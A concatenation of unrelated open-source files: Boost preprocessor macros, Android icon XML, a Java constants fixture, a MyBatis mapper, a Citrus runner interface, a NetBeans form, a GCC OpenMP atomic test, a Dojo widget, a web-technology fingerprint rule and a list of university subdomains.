# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_84(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_85(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_86(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_87(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_88(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_89(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_90(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_91(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_92(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_93(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_94(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_95(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_96(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_97(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_98(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_99(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_100(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_101(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_102(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_103(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_104(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_105(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_106(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_107(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_108(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_109(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_110(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_111(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_112(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_113(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_114(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_115(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_116(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_117(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_118(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_119(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_120(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_121(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_122(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_123(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_124(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_125(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_126(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_127(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_128(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_129(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_130(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_131(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_132(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_133(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_134(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_135(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_136(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_137(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_138(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_139(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_140(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_141(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_142(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_143(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_144(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_145(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_146(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_147(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_148(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_149(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_150(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_151(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_152(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_153(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_154(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_155(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_156(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_157(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_158(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_159(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_160(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_161(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_162(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_163(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_164(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_165(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_166(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_167(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_168(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_169(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_170(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_171(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_172(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_173(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_174(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_175(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_176(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_177(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_178(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_179(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_180(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_181(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_182(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_183(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_184(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_185(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_186(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_187(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_188(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_189(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_190(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_191(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_192(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_193(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_194(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_195(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_196(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_197(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_198(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_199(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_200(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_201(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_202(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_203(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_204(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_205(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_206(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_207(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_208(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_209(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_210(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_211(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_212(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_213(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_214(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_215(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_216(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_217(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_218(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_219(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_220(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_221(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_222(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_223(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_224(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_225(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_226(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_227(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_228(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_229(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_230(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_231(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_232(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_233(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_234(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_235(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_236(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_237(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_238(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_239(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_240(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_241(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_242(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_243(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_244(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_245(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_246(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_247(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_248(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_249(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_250(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_251(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_252(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_253(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_254(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_255(p, o, s) 0
# define BOOST_PP_WHILE_CHECK_BOOST_PP_WHILE_256(p, o, s) 0
#
# endif
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<adaptive-icon xmlns:android="http://schemas.android.com/apk/res/android">
<background android:drawable="@android:color/white"/>
<foreground android:drawable="@mipmap/ic_launcher_foreground"/>
</adaptive-icon> | {
"pile_set_name": "Github"
} |
/*
* Copyright 2000-2014 JetBrains s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package pkg;
// NOTE(review): this class looks like a decompiler round-trip fixture (package
// `pkg`, every primitive boundary constant exercised) -- the exact literals and
// annotation spellings are the test data, so nothing here may be "simplified".
public class TestConstants {
    // Boolean literals.
    static final boolean T = true;
    static final boolean F = false;

    // char edge cases: an escape, a plain letter, and a value above the
    // 8-bit range (512 = '\u0200') that must not be emitted as a byte.
    static final char C0 = '\n';
    static final char C1 = 'a';
    static final char C2 = 512;

    // Extremes of every integral primitive type.
    static final byte BMin = Byte.MIN_VALUE;
    static final byte BMax = Byte.MAX_VALUE;
    static final short SMin = Short.MIN_VALUE;
    static final short SMax = Short.MAX_VALUE;
    static final int IMin = Integer.MIN_VALUE;
    static final int IMax = Integer.MAX_VALUE;
    static final long LMin = Long.MIN_VALUE;
    static final long LMax = Long.MAX_VALUE;

    // Floating-point special values and extremes.
    static final float FNan = Float.NaN;
    static final float FNeg = Float.NEGATIVE_INFINITY;
    static final float FPos = Float.POSITIVE_INFINITY;
    static final float FMin = Float.MIN_VALUE;
    static final float FMax = Float.MAX_VALUE;
    static final double DNan = Double.NaN;
    static final double DNeg = Double.NEGATIVE_INFINITY;
    static final double DPos = Double.POSITIVE_INFINITY;
    static final double DMin = Double.MIN_VALUE;
    static final double DMax = Double.MAX_VALUE;

    // Annotation taking a Class value, used below with every primitive class
    // literal (including void.class) plus one reference type.
    static @interface A {
        Class<?> value();
    }

    @A(byte.class) void m1() { }
    @A(char.class) void m2() { }
    @A(double.class) void m3() { }
    @A(float.class) void m4() { }
    @A(int.class) void m5() { }
    @A(long.class) void m6() { }
    @A(short.class) void m7() { }
    @A(boolean.class) void m8() { }
    @A(void.class) void m9() { }
    @A(java.util.Date.class) void m10() { }
} | {
"pile_set_name": "Github"
} |
{
"name": "React.js",
"author": "fofa",
"version": "0.1.0",
"matches": [
{
"search": "body",
"text": "/react.js"
},
{
"search": "body",
"text": "React.createClass"
}
]
} | {
"pile_set_name": "Github"
} |
package com.story.storyadmin.mapper.sysmgr;
import com.baomidou.mybatisplus.annotation.SqlParser;
import com.baomidou.mybatisplus.core.conditions.query.QueryWrapper;
import com.baomidou.mybatisplus.core.mapper.BaseMapper;
import com.baomidou.mybatisplus.core.toolkit.Constants;
import com.story.storyadmin.domain.entity.sysmgr.User;
import com.story.storyadmin.domain.entity.sysmgr.UserRole;
import org.apache.ibatis.annotations.Param;
import org.apache.ibatis.annotations.Select;
import java.util.List;
/**
 * <p>
 * Mapper interface for the user table ({@code st_user}).
 * </p>
 *
 * @author sunnj
 * @since 2018-12-28
 */
public interface UserMapper extends BaseMapper<User> {
    /**
     * Looks up users by account while bypassing the multi-tenant filter:
     * {@code @SqlParser(filter = true)} tells MyBatis-Plus to skip tenant-line
     * SQL rewriting for this statement, so the query sees all tenants.
     * The WHERE clause is supplied entirely by the caller's wrapper via
     * {@code ${ew.customSqlSegment}}.
     *
     * @param wrapper query wrapper carrying the account condition (bound to
     *                the {@code ew} parameter expected by the SQL template)
     * @return users matching the wrapper's conditions
     */
    @SqlParser(filter=true)
    @Select("SELECT id,account,name,password,status,erp_flag FROM st_user ${ew.customSqlSegment}")
    List<User> findUserByAccount(@Param(Constants.WRAPPER) QueryWrapper<User> wrapper);
}
| {
"pile_set_name": "Github"
} |
package com.consol.citrus;
/**
 * Runner controlling the execution life-cycle of a single test case.
 * Combines the construction API of {@link TestCaseBuilder} with the
 * Gherkin-style action API of {@code GherkinTestActionRunner}, adding
 * explicit start/stop hooks around the run.
 *
 * @author Christoph Deppisch
 */
public interface TestCaseRunner extends TestCaseBuilder, GherkinTestActionRunner {

    /**
     * Starts the test case execution.
     */
    void start();

    /**
     * Stops test case execution.
     */
    void stop();
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8" ?>
<!--
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
-->
<Form version="1.5" maxVersion="1.8" type="org.netbeans.modules.form.forminfo.JPanelFormInfo">
<AuxValues>
<AuxValue name="FormSettings_autoResourcing" type="java.lang.Integer" value="1"/>
<AuxValue name="FormSettings_autoSetComponentName" type="java.lang.Boolean" value="false"/>
<AuxValue name="FormSettings_generateFQN" type="java.lang.Boolean" value="true"/>
<AuxValue name="FormSettings_generateMnemonicsCode" type="java.lang.Boolean" value="true"/>
<AuxValue name="FormSettings_i18nAutoMode" type="java.lang.Boolean" value="true"/>
<AuxValue name="FormSettings_layoutCodeTarget" type="java.lang.Integer" value="1"/>
<AuxValue name="FormSettings_listenerGenerationStyle" type="java.lang.Integer" value="0"/>
<AuxValue name="FormSettings_variablesLocal" type="java.lang.Boolean" value="false"/>
<AuxValue name="FormSettings_variablesModifier" type="java.lang.Integer" value="2"/>
</AuxValues>
<Layout>
<DimensionLayout dim="0">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" alignment="1" attributes="0">
<EmptySpace max="-2" attributes="0"/>
<Group type="103" groupAlignment="1" attributes="0">
<Component id="customPanelContainer" max="32767" attributes="0"/>
<Component id="commonPanelContainer" alignment="0" max="32767" attributes="0"/>
<Group type="102" alignment="0" attributes="0">
<Component id="lLanguage" min="-2" max="-2" attributes="0"/>
<EmptySpace min="-2" pref="3" max="-2" attributes="0"/>
<Component id="cboLanguage" min="-2" max="-2" attributes="0"/>
<EmptySpace min="0" pref="0" max="32767" attributes="0"/>
</Group>
</Group>
<EmptySpace max="-2" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
<DimensionLayout dim="1">
<Group type="103" groupAlignment="0" attributes="0">
<Group type="102" alignment="0" attributes="0">
<EmptySpace max="-2" attributes="0"/>
<Group type="103" groupAlignment="3" attributes="0">
<Component id="lLanguage" alignment="3" min="-2" max="-2" attributes="0"/>
<Component id="cboLanguage" alignment="3" min="-2" max="-2" attributes="0"/>
</Group>
<EmptySpace type="unrelated" max="-2" attributes="0"/>
<Component id="commonPanelContainer" min="-2" max="-2" attributes="0"/>
<EmptySpace type="unrelated" max="-2" attributes="0"/>
<Component id="customPanelContainer" max="32767" attributes="0"/>
<EmptySpace max="-2" attributes="0"/>
</Group>
</Group>
</DimensionLayout>
</Layout>
<SubComponents>
<Component class="javax.swing.JLabel" name="lLanguage">
<Properties>
<Property name="labelFor" type="java.awt.Component" editor="org.netbeans.modules.form.ComponentChooserEditor">
<ComponentRef name="cboLanguage"/>
</Property>
<Property name="text" type="java.lang.String" editor="org.netbeans.modules.i18n.form.FormI18nStringEditor">
<ResourceString bundle="org/netbeans/modules/options/editor/onsave/Bundle.properties" key="OnSaveTabPanel.lLanguage.text" replaceFormat="org.openide.util.NbBundle.getMessage({sourceFileName}.class, "{key}")"/>
</Property>
</Properties>
</Component>
<Component class="javax.swing.JComboBox" name="cboLanguage">
<Properties>
<Property name="model" type="javax.swing.ComboBoxModel" editor="org.netbeans.modules.form.editors2.ComboBoxModelEditor">
<StringArray count="0"/>
</Property>
</Properties>
<Events>
<EventHandler event="actionPerformed" listener="java.awt.event.ActionListener" parameters="java.awt.event.ActionEvent" handler="languageChanged"/>
</Events>
</Component>
<Container class="javax.swing.JPanel" name="commonPanelContainer">
<Layout>
<DimensionLayout dim="0">
<Group type="103" groupAlignment="0" attributes="0">
<EmptySpace min="0" pref="241" max="32767" attributes="0"/>
</Group>
</DimensionLayout>
<DimensionLayout dim="1">
<Group type="103" groupAlignment="0" attributes="0">
<EmptySpace min="0" pref="90" max="32767" attributes="0"/>
</Group>
</DimensionLayout>
</Layout>
</Container>
<Container class="javax.swing.JPanel" name="customPanelContainer">
<Layout>
<DimensionLayout dim="0">
<Group type="103" groupAlignment="0" attributes="0">
<EmptySpace min="0" pref="0" max="32767" attributes="0"/>
</Group>
</DimensionLayout>
<DimensionLayout dim="1">
<Group type="103" groupAlignment="0" attributes="0">
<EmptySpace min="0" pref="137" max="32767" attributes="0"/>
</Group>
</DimensionLayout>
</Layout>
</Container>
</SubComponents>
</Form>
| {
"pile_set_name": "Github"
} |
// { dg-do run }
extern "C" void abort (void);
/* Exercises every spelling of the `seq_cst` clause on `#pragma omp atomic`
   (before/after the atomic kind, comma-separated or space-separated) across
   the read / update / capture forms.  The running value of the global `x`
   (declared `extern T x;` -- backed by `int x = 6;` at file scope) is checked
   after each operation; statement order is load-bearing, as each expected
   value depends on every preceding atomic.  Do not reorder or "simplify" the
   arithmetic: the unreduced expressions (e.g. `3 * 2 * 1 + x`) are part of
   what the compiler must handle.  */
template <typename T>
void
foo ()
{
  extern T x;             /* shared variable all atomics target; starts at 6 */
  T v, l = 2, s = 1;      /* v: captured value; l, s: scratch for the last cases */

  /* update form, clause after kind: x = 6 - 3 = 3 */
  #pragma omp atomic seq_cst
  x = -3 + x;
  #pragma omp atomic read seq_cst
  v = x;
  if (v != 3)
    abort ();

  /* explicit `update` keyword: x = 3 + 6 = 9 */
  #pragma omp atomic seq_cst update
  x = 3 * 2 * 1 + x;
  #pragma omp atomic read, seq_cst
  v = x;
  if (v != 9)
    abort ();

  /* capture form returning the NEW value (v = x after the update) */
  #pragma omp atomic seq_cst, capture
  v = x = x | 16;
  if (v != 25)
    abort ();
  #pragma omp atomic capture seq_cst
  v = x = x + 14 * 2 / 4;
  if (v != 32)
    abort ();
  #pragma omp atomic seq_cst capture
  v = x = 5 | x;
  if (v != 37)
    abort ();
  #pragma omp atomic capture, seq_cst
  v = x = 40 + 12 - 2 - 7 - x;
  if (v != 6)
    abort ();
  #pragma omp atomic seq_cst read
  v = x;
  if (v != 6)
    abort ();

  /* structured-block capture, OLD value first: v gets x before the update */
  #pragma omp atomic capture seq_cst
  { v = x; x = 3 + x; }
  if (v != 6)
    abort ();
  #pragma omp atomic seq_cst capture
  { v = x; x = -1 * -1 * -1 * -1 - x; }
  if (v != 9)
    abort ();
  #pragma omp atomic read seq_cst
  v = x;
  if (v != -8)
    abort ();

  /* structured-block capture, NEW value: update first, then v = x */
  #pragma omp atomic capture, seq_cst
  { x = 2 * 2 - x; v = x; }
  if (v != 12)
    abort ();
  #pragma omp atomic seq_cst capture
  { x = 7 & x; v = x; }
  if (v != 4)
    abort ();

  /* capture combined with a plain write (atomic swap semantics) */
  #pragma omp atomic capture seq_cst
  { v = x; x = 6; }
  if (v != 4)
    abort ();
  #pragma omp atomic read, seq_cst
  v = x;
  if (v != 6)
    abort ();
  #pragma omp atomic capture seq_cst
  { v = x; x = 7 * 8 + 23; }
  if (v != 6)
    abort ();
  #pragma omp atomic seq_cst, read
  v = x;
  if (v != 79)
    abort ();
  #pragma omp atomic capture , seq_cst
  { v = x; x = 23 + 6 * 4; }
  if (v != 79)
    abort ();
  #pragma omp atomic read seq_cst
  v = x;
  if (v != 47)
    abort ();

  /* written value may be an arbitrary expression evaluated outside the
     atomic store: conditional, then a nested assignment with side effects */
  #pragma omp atomic seq_cst capture
  { v = x; x = l ? 17 : 12; }
  if (v != 47)
    abort ();
  #pragma omp atomic capture seq_cst
  { v = x; x = l = s++ + 3; }
  if (v != 17 || l != 4 || s != 2)
    abort ();
  #pragma omp atomic read seq_cst
  v = x;
  if (v != 4)
    abort ();
}
/* Backing storage for the `extern T x` referenced inside foo(); the initial
   value 6 is what the first atomic update in foo<int>() builds on.  */
int x = 6;

int
main ()
{
  foo <int> ();
  return 0;
}
| {
"pile_set_name": "Github"
} |
import { DNode } from '../../../../src/core/interfaces';
import { WidgetBase } from '../../../../src/core/WidgetBase';
import { v, w } from '../../../../src/core/vdom';
import { Button } from './Button';
export interface ButtonConfig {
	id: string;
	label: string;
	onClick: () => void;
}

export interface ButtonsProperties {
	buttonConfigs: ButtonConfig[];
}

/**
 * Jumbotron header widget: a title column on the left and, on the right,
 * one `Button` child per entry in `buttonConfigs` (keyed by the config id).
 */
export class Buttons extends WidgetBase<ButtonsProperties> {
	protected render(): DNode {
		const configs = this.properties.buttonConfigs;

		// Build the button children up front; `key` keeps vdom diffing stable.
		const buttonNodes = configs.map((config) =>
			w(Button, {
				key: config.id,
				id: config.id,
				label: config.label,
				onClick: config.onClick
			})
		);

		const titleColumn = v('div', { classes: ['col-md-6'] }, [v('h1', ['Dojo2 v0.2.0'])]);
		const buttonColumn = v('div', { classes: ['col-md-6'] }, buttonNodes);

		return v('div', { classes: ['jumbotron'] }, [v('div', { classes: ['row'] }, [titleColumn, buttonColumn])]);
	}
}
| {
"pile_set_name": "Github"
} |
jwc.njnu.edu.cn
bwc.njnu.edu.cn
k5a0c.njnu.edu.cn
wxy.njnu.edu.cn
waiyadmin.njnu.edu.cn
yjs.njnu.edu.cn
jgzfjs.njnu.edu.cn
ysjyzx.njnu.edu.cn
zcc.njnu.edu.cn
jwcl.njnu.edu.cn
zcjygs.njnu.edu.cn
gc.njnu.edu.cn
xhzyz.njnu.edu.cn
music.njnu.edu.cn
geomodeling.njnu.edu.cn
hgdq.njnu.edu.cn
physics.njnu.edu.cn
bkzs.njnu.edu.cn
qhy.njnu.edu.cn
xuebao.njnu.edu.cn
hi.njnu.edu.cn
hxlib.njnu.edu.cn
tky.njnu.edu.cn
0101.njnu.edu.cn
www.kc.njnu.edu.cn
wwwgrad.njnu.edu.cn
idc.njnu.edu.cn
jcfw.njnu.edu.cn
linkage.njnu.edu.cn
www.gr.njnu.edu.cn
mlclab.njnu.edu.cn
rsc.njnu.edu.cn
jxjy.njnu.edu.cn
sydj.njnu.edu.cn
clpen.njnu.edu.cn
fytz.njnu.edu.cn
math.njnu.edu.cn
gra.njnu.edu.cn
xngpd.njnu.edu.cn
qfz.njnu.edu.cn
